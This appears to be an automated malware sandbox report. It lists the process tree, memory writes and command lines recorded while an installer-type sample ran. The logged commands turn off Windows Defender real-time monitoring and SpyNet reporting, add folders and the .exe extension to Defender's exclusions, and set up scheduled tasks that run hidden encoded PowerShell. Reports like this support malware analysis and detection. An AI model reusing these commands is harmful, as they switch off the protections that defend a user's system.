4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	cOacQrK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	cOacQrK.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEcOacQrK.exe

pid	process
396	powershell.EXE
396	powershell.EXE
396	powershell.EXE
1728	powershell.EXE
1728	powershell.EXE
1728	powershell.EXE
2044	powershell.EXE
2044	powershell.EXE
2044	powershell.EXE
1620	powershell.EXE
1620	powershell.EXE
1620	powershell.EXE
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe
1652	cOacQrK.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	396	powershell.EXE
Token: SeDebugPrivilege	1728	powershell.EXE
Token: SeDebugPrivilege	2044	powershell.EXE
Token: SeDebugPrivilege	1620	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 1268 wrote to memory of 824	1268	file.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 824 wrote to memory of 936	824	Install.exe	Install.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 2028	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 936 wrote to memory of 1328	936	Install.exe	forfiles.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 1328 wrote to memory of 1376	1328	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 2028 wrote to memory of 1440	2028	forfiles.exe	cmd.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 960	1376	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1440 wrote to memory of 1596	1440	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1568	1376	cmd.exe	reg.exe
PID 1440 wrote to memory of 1772	1440	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1268

C:\Users\Admin\AppData\Local\Temp\7zS1288.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:824

C:\Users\Admin\AppData\Local\Temp\7zS1A65.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1440

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1596

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1772

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1376

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:960

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gjLzXSDqS" /SC once /ST 09:49:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:780

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gjLzXSDqS"
4⤵
PID:1948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gjLzXSDqS"
4⤵
PID:700

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 13:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\ETvzHmh.exe\" Qf /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:812

C:\Windows\system32\taskeng.exe
taskeng.exe {9A6228B2-40B6-4D89-A88A-102951D5FBBE} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:992

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1300

C:\Windows\system32\taskeng.exe
taskeng.exe {A0F1DA24-8C91-4DFB-8B0E-19CE4D5CFAFE} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\ETvzHmh.exe
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\ETvzHmh.exe Qf /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1424

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNtPjlfQm" /SC once /ST 11:39:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNtPjlfQm"
3⤵
PID:1736

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNtPjlfQm"
3⤵
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:944

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:920

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:700

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gzuNWEGgB" /SC once /ST 04:15:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1852

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gzuNWEGgB"
3⤵
PID:1360

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gzuNWEGgB"
3⤵
PID:888

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1368

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1504

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1300

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1464

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\MNBTbrbBidagOXts\cYZQBYbp\TmeucAINtuxxKjge.wsf"
3⤵
PID:920

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\MNBTbrbBidagOXts\cYZQBYbp\TmeucAINtuxxKjge.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1232

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RIEoyfpemMjlUPVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH" /t REG_DWORD /d 0 /reg:32
4⤵
PID:368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MNBTbrbBidagOXts" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1992

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqAIrPmjZ" /SC once /ST 12:21:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2044

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqAIrPmjZ"
3⤵
PID:1116

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqAIrPmjZ"
3⤵
PID:1648

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:1336

C:\Windows\SysWOW64\cmd.exe
